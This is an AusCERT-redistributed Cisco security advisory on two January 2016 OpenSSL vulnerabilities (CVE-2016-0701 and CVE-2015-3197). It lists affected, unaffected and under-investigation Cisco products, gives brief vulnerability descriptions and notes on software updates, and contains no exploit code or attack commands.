Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2016.0279 Multiple Vulnerabilities in OpenSSL (January 2016) Affecting Cisco Products 4 February 2016 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco products Publisher: Cisco Systems Operating System: Cisco Impact/Access: Access Privileged Data -- Remote/Unauthenticated Provide Misleading Information -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2016-0701 CVE-2015-3197 Reference: ESB-2016.0250 Original Bulletin: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160129-openssl - --------------------------BEGIN INCLUDED TEXT-------------------- Multiple Vulnerabilities in OpenSSL (January 2016) Affecting Cisco Products High Advisory ID: cisco-sa-20160129-openssl Last Updated: 2016 February 2 15:26 GMT Published: 2016 January 29 16:00 GMT Version 1.1: Interim Workarounds: No workarounds available CVE-2015-3197 CVE-2016-0701 Summary On January 28, 2016, the OpenSSL Project released a security advisory detailing two vulnerabilities. Multiple Cisco products incorporate a version of the OpenSSL package affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to conduct man-in-the-middle attacks on an SSL/TLS connection. This advisory will be updated as additional information becomes available. Cisco will release software updates that address these vulnerabilities. Workarounds that address these vulnerabilities are not available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160129-openssl Affected Products Cisco is currently investigating its product line to determine which products may be affected by these vulnerabilities and the impact on each affected product. As the investigation progresses, this document will be updated to include the Cisco bug IDs for each affected product. The bugs will be accessible through the Cisco Bug Search Tool and will contain additional platform-specific information, including workarounds (if available) and fixed software versions. The following products are under active investigation to determine whether they are affected by the vulnerability that is described in this advisory. Products Under Investigation Collaboration and Social Media Cisco WebEx Meetings Server versions 1.x Cisco WebEx Meetings Server versions 2.x Endpoint Clients and Client Software Cisco Agent for OpenFlow Cisco AnyConnect Secure Mobility Client for Android Cisco AnyConnect Secure Mobility Client for Linux Cisco AnyConnect Secure Mobility Client for OS X Cisco AnyConnect Secure Mobility Client for Windows Cisco AnyConnect Secure Mobility Client for iOS Cisco Jabber for Android Cisco Jabber for Windows Cisco Jabber for iOS Cisco MMP Server Cisco WebEx Connect Client (Windows) Cisco WebEx Meetings Client - Hosted Cisco WebEx Meetings Client - On-premises Cisco WebEx Meetings for Blackberry Cisco WebEx Meetings for WP8 WebEx Meetings Server - SSL Gateway WebEx Recording Playback Client Network Application, Service, and Acceleration Cisco ACE 30 Application Control Engine Module Cisco ACE 4710 Application Control Engine (A5) Cisco InTracer Cisco Network Admission Control (NAC) Cisco Visual Quality Experience Server Cisco Visual Quality Experience Tools Server Network and Content Security Devices Cisco ASA Next-Generation Firewall Services Cisco Clean Access Manager Cisco Content Security Appliance Updater Servers Cisco Content Security Management Appliance (SMA) Cisco Email Security Appliance (ESA) Cisco IPS Cisco Identity Services Engine (ISE) Cisco IronPort Encryption Appliance (IEA) Cisco NAC Guest Server Cisco NAC Server Cisco Physical Access Control Gateway Cisco Secure Access Control Server (ACS) Cisco Virtual Security Gateway for Microsoft Hyper-V Cisco Web Security Appliance (WSA) Network Management and Provisioning Cisco Application Networking Manager Cisco Application Policy Infrastructure Controller (APIC) Cisco Cloupia Unified Infrastructure Controller Cisco Configuration Professional Cisco MATE Collector Cisco MATE Design Cisco MATE Live Cisco Management Appliance (MAP) Cisco NetFlow Generation Appliance Cisco Prime Access Registrar Cisco Prime Collaboration Assurance Cisco Prime Collaboration Deployment Cisco Prime Data Center Network Manager (DCNM) Cisco Prime Home Cisco Prime Infrastructure Cisco Prime LAN Management Solution (LMS - Solaris) Cisco Prime License Manager Cisco Prime Network Registrar IP Address Manager (IPAM) Cisco Prime Performance Manager Cisco Prime Security Manager Cisco Quantum Policy Suite (QPS) Cisco Quantum SON Suite Cisco Security Manager Routing and Switching - Enterprise and Service Provider Cisco ASR 5000 Series Cisco Connected Grid Router - CGOS Cisco Connected Grid Router Cisco IOS XE (SSLVPN feature) Cisco IOS XE (WebUI feature only) Cisco IOS XR Cisco Nexus 1000V InterCloud Cisco Nexus 1000V Series Switches (ESX) Cisco Nexus 1000V Series Switches Cisco Nexus 1000V Switch for Microsoft Hyper-V Cisco Nexus 1010 Cisco Nexus 3000 Series Switches Cisco Nexus 3X00 Series Switches Cisco Nexus 4000 Series Blade Switches Cisco Nexus 5000 Series Switches Cisco Nexus 9000 (ACI/Fabric Switch) Cisco Nexus 9000 Series (standalone, running NxOS) Cisco Nexus 9000 Series Switches Cisco ONS 15454 Series Multiservice Provisioning Platforms Cisco Service Control Operating System Routing and Switching - Small Business Cisco Sx220 switches Cisco Sx300 switches Cisco Sx500 switches Unified Computing Cisco Common Services Platform Collector Cisco Standalone rack server CIMC Cisco UCS Invicta Series Solid State Systems Cisco Unified Computing System (Management software) Cisco Unified Computing System B-Series (Blade) Servers Cisco Virtual Security Gateway Voice and Unified Communications Devices Cisco 7937 IP Phone Cisco ATA 187 Analog Telephone Adaptor Cisco Agent Desktop for Cisco Unified Contact Center Express Cisco Agent Desktop Cisco DX Series IP Phones Cisco Emergency Responder Cisco Finesse Cisco IM and Presence Service (CUPS) Cisco MediaSense Cisco MeetingPlace Cisco Packaged Contact Center Enterprise Cisco Paging Server (Informacast) Cisco Paging Server Cisco Remote Silent Monitoring Cisco TAPI Service Provider (TSP) Cisco Unified 8831 series IP Conference Phone Cisco Unified Attendant Console Advanced Cisco Unified Attendant Console Business Edition Cisco Unified Attendant Console Department Edition Cisco Unified Attendant Console Enterprise Edition Cisco Unified Attendant Console Premium Edition Cisco Unified Attendant Console Standard Cisco Unified Communications Domain Manager Cisco Unified Communications Manager (UCM) Cisco Unified Communications Manager Session Management Edition (SME) Cisco Unified Communications for Microsoft Lync Cisco Unified E-Mail Interaction Manager Cisco Unified SIP Proxy Cisco Unified Web Interaction Manager Cisco Unified Workforce Optimization Quality Management Cisco Unified Workforce Optimization Cisco Unity Connection (UC) Cisco Virtual PGW 2200 Softswitch Cisco Virtualization Experience Media Engine Cisco Voice Portal (CVP) Video, Streaming, TelePresence, and Transcoding Devices Cisco AnyRes Live (CAL) Cisco D9859 Advanced Receiver Transcoder Cisco DCM Series 9900-Digital Content Manager Cisco Enterprise Content Delivery System (ECDS) Cisco Expressway Series Cisco Headend System Release Cisco Internet Streamer (CDS) Cisco Model D9485 DAVIC QPSK Cisco TelePresence 1310 Cisco TelePresence Conductor Cisco TelePresence Content Server (TCS) Cisco TelePresence ISDN GW 3241 Cisco TelePresence ISDN GW MSE 8321 Cisco TelePresence ISDN Link Cisco TelePresence MCU (8510, 8420, 4200, 4500, and 5300) Cisco TelePresence Serial Gateway Series Cisco TelePresence Server 8710, 7010 Cisco TelePresence Server on Multiparty Media 310, 320 Cisco TelePresence Server on Virtual Machine Cisco TelePresence Supervisor MSE 8050 Cisco TelePresence System 1000 Cisco TelePresence System 1100 Cisco TelePresence System 1300 Cisco TelePresence System 3000 Series Cisco TelePresence System 500-32 Cisco TelePresence System 500-37 Cisco TelePresence TX 9000 Series Cisco TelePresence Video Communication Server (VCS) Cisco VEN501 Wireless Access Point Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) Cisco Video Surveillance 3000 Series IP Cameras Cisco Video Surveillance 4000 Series High-Definition IP Cameras Cisco Video Surveillance 4300E/4500E High-Definition IP Cameras Cisco Video Surveillance 6000 Series IP Cameras Cisco Video Surveillance 7000 Series IP Cameras Cisco Video Surveillance Media Server Cisco Video Surveillance PTZ IP Cameras Cisco Videoscape Control Suite Cloud Object Store (COS) Tandberg Codian ISDN GW 3210/3220/3240 Tandberg Codian MSE 8320 model Wireless Cisco Aironet 2700 Series Access Point Cisco Mobility Services Engine (MSE) Cisco Wireless LAN Controller (WLC) Cisco Hosted Services Cisco Cloud Web Security Cisco Connected Analytics For Collaboration Cisco Intelligent Automation for Cloud Cisco One Portal Cisco Proactive Network Operations Center Cisco Smart Care Cisco SmartConnection Cisco SmartReports Cisco UCS Invicta Series Autosupport Portal Cisco Unified Services Delivery Platform (CUSDP) Cisco Universal Small Cell usc-iuh Cisco WebEx Meeting Center Cisco WebEx Meetings (Meeting Center, Training Center, Event Center, Support Center) Communication/Collaboration Sizing Tool, Virtue Machine Placement Tool, Cisco Unified Communications Upgrade Readiness Assessment Life Cycle Management Agent Manager (LCM) Network Health Framework (NHF) Network Performance Analytics (NPA) Partner Supporting Service (PSS) 1.x Services Analytic Platform Small Cell factory recovery root filesystem V2.99.4 or later Vulnerable Products The following table lists Cisco products that are affected by the vulnerability that is described in this advisory. Product Defect Network Management and Provisioning Cisco Prime Collaboration Provisioning CSCuy07329 Cisco Prime Optical for SPs C SCuy07316 Routing and Switching - Enterprise and Service Provider Cisco MDS 9000 Series Multilayer Switches CSCuy07280 Cisco Nexus 5000 Series Switches CSCuy07280 Cisco Nexus 6000 Series Switches CSCuy07280 Cisco Nexus 7000 Series Switches CSCuy07280 Voice and Unified Communications Devices Cisco 8800 Series IP Phones - VPN Feature CSCuy07524 Cisco Computer Telephony Integration Object Server (CTIOS) CSCuy07225 Cisco Unified 7800 Series IP Phones CSCuy07527 Cisco Unified 8945 IP Phone CSCuy07517 Cisco Unified Contact Center Enterprise CSCuy07225 Cisco Unified Intelligent Contact Management Enterprise CSCuy07225 Video, Streaming, TelePresence, and Transcoding Devices Cisco Edge 300 Digital Media Player CSCuy07442 Cisco Hosted Services Cisco Registered Envelope Service (CRES) CSCuy07230 Cisco WebEx Messenger Service CSCuy07254 Products Confirmed Not Vulnerable The following products are not affected by the vulnerability that is described in this advisory. Collaboration and Social Media Cisco WebEx Node for MCS Endpoint Clients and Client Software Cisco Jabber Guest Release 10.0(2) Cisco Jabber Software Development Kit Cisco Jabber for Mac Cisco WebEx Meetings for Android Cisco WebEx Productivity Tools Network Application, Service, and Acceleration Cisco Application and Content Networking System (ACNS) Cisco Wide Area Application Services (WAAS) Network and Content Security Devices Cisco ASA CX and Cisco Prime Security Manager Cisco ASA Content Security and Control (CSC) Security Services Module Cisco Adaptive Security Appliance (ASA) Cisco FireSIGHT System Software Cisco Secure Access Control System (ACS) Network Management and Provisioning Cisco Digital Media Manager Cisco Mobile Wireless Transport Manager Cisco Multicast Manager Cisco Network Analysis Module Cisco Packet Tracer Cisco Prime IP Express Cisco Prime Infrastructure Standalone Plug and Play Gateway Cisco Prime Network Registrar (CPNR) Cisco Prime Network Services Controller Cisco Prime Network Cisco Show and Share (SnS) Cisco UCS Central Local Collector Appliance (LCA) Routing and Switching - Enterprise and Service Provider Cisco 910 Industrial Router Cisco Broadband Access Center Telco Wireless Cisco IOS Software and Cisco IOS XE Software Cisco OnePK All-in-One VM Voice and Unified Communications Devices Cisco 190 ATA Series Analog Terminal Adaptor Cisco Hosted Collaboration Mediation Fulfillment Cisco IP Interoperability and Collaboration System (IPICS) Cisco SPA112 2-Port Phone Adapter Cisco SPA122 ATA with Router Cisco SPA232D Multi-Line DECT ATA Cisco SPA30X Series IP Phones Cisco SPA50X Series IP Phones Cisco SPA51X Series IP Phones Cisco SPA525G Cisco SPA8000 8-port IP Telephony Gateway Cisco SPA8800 IP Telephony Gateway with 4 FXS and 4 FXO Ports Cisco Unified 6901 IP Phones Cisco Unified 6945 IP Phones Cisco Unified 8961 IP Phone Cisco Unified 9951 IP Phone Cisco Unified 9971 IP Phone Cisco Unified IP Conference Phone 8831 for Third-Party Call Control Cisco Unified IP Phone 7900 Series Cisco Unified Wireless IP Phone Video, Streaming, TelePresence, and Transcoding Devices Cisco AnyRes VOD (CAL) Cisco Digital Media Players (DMP) 4300 Series Cisco Digital Media Players (DMP) 4400 Series Cisco Edge 340 Digital Media Player Cisco Media Experience Engines (MXE) Cisco Media Services Interface Cisco TelePresence EX Series Cisco TelePresence MX Series Cisco TelePresence Profile Series Cisco TelePresence SX Series Cisco TelePresence Integrator C Series Cisco Hosted Services Cisco Services Provisioning Platform (SPP) Cisco Universal Small Cell 5000 Series running V3.4.2.x software Cisco Universal Small Cell 7000 Series running V3.4.2.x software Serial Number Assessment Service (SNAS) Details The vulnerability names and the associated Common Vulnerabilities and Exposures (CVE) IDs for the January 28, 2016, OpenSSL Project announcement are as follows: OpenSSL DH Small Subgroups Vulnerability A vulnerability in the generation of Diffie-Hellman (DH) parameters based on unsafe primes in OpenSSL could allow an unauthenticated, remote attacker to discover a TLS server's private DH exponent. The vulnerability is due to ability to generate DH parameters based on unsafe primes, introduced in version 1.0.2 of OpenSSL, where the support was provided for generating X9.42 style parameter files. An attacker could exploit this vulnerability by completing multiple handshakes in which the peer uses the same private DH exponent. An exploit could allow the attacker to discover a TLS server's private DH exponent and conduct man-in-the-middle attacks on the SSL/TLS connection. This vulnerability has been assigned CVE ID CVE-2016-0701. OpenSSL SSLv2 Doesnt Block Disabled Ciphers A vulnerability in the SSL negotiation of OpenSSL could allow an unauthenticated, remote attacker to negotiate SSLv2 ciphers that have been disabled on the server. The vulnerability is due to the ability of a malicious client to negotiate SSLv2 ciphers, that have been disabled on the server, and complete an SSLv2 handshake even if all SSLv2 ciphers have been disabled. An exploit could allow the attacker to negotiate weak SSLv2 ciphers for SSL/TLS connections, making them vulnerable to man-in-the-middle attacks. This vulnerability has been assigned CVE ID CVE-2015-3197. Workarounds Any workarounds will be documented in the Cisco bugs, which are accessible through the Cisco Bug Search Tool. Fixed Software Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades, customers are advised to consult the Cisco Security Advisories and Responses archive at http://www.cisco.com/go/psirt and review subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to upgrade contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Exploitation and Public Announcements The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source These vulnerabilities were publicly disclosed by the OpenSSL Project on January 28, 2016. URL http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160129-openssl Revision History Version Description Section Status Date 1.1 Updated information about products Affected Products Interim 2016-February-02 under investigation, confirmed as not vulnerable, and vulnerable. 1.0 Initial public release. - Interim 2016-January-29 Legal Disclaimer THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. CISCO EXPECTS TO UPDATE THIS DOCUMENT AS NEW INFORMATION BECOMES AVAILABLE. A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products. - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/render.html?cid=1980 =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBVrKjaX6ZAP0PgtI9AQLPvw/+JuBMEG/A0McE8ulHHpVdREP+ILn+MCAP osY/TRui5kVQzXb4AGNqweZoqiWKrynKJHRMPGHN20Y3YoJp6t04MYzM1uAKzHeW 9TzWbOvkDlPw29BoCifXc/tZgTfq4+vwgvOktgP0C0HKHr+6J5LyuAEorq58OyEp 8kqfCmOe86B1j7fRyx50u2FbqnCcMk9WAET2+Ljxfcy2xiqI6cVLtFvPebPIBGYJ B2WV34S9ItX+2v8bLSRgMFUVrF2vsiByWDJJU47rLDwPC56nRfkWsdXn+aoH9DhF PIBHQI7e9DYmXGFgY/yiEwhxV8vreU1U7CN3L7kh82Id7qmn+xwoFo80+51wC4fx XoGcC2MhgT8KVQeZ6RUELdFFUgBNulZNZyOV9yfjySL5A7Rn1vOsdRLnNISiKP91 Ogu69TTW92Pl5FnxxMvPeEiakUC2fQAYNys4oZe0UJUROB+QYsvCnjp+dz3DYPak L75SKdHBo64Y7APsHsNKQ+jj7AXO6ZABpQg5ogwM9bTacl6qYVvfzuVt1aa1OBIw ebdo0hErIpvuxcn5pSUOuLAPxnqRYw0xIXkBuEoPKql7K0uoGmO6umimzG8R58eZ XVWkTK0hwxcbk9tQ++R82dsU9BhzydaVGC99GqezoeiKuiSsSKWN4B0CKsGMjd/R WVY078fi14g= =hoV1 -----END PGP SIGNATURE-----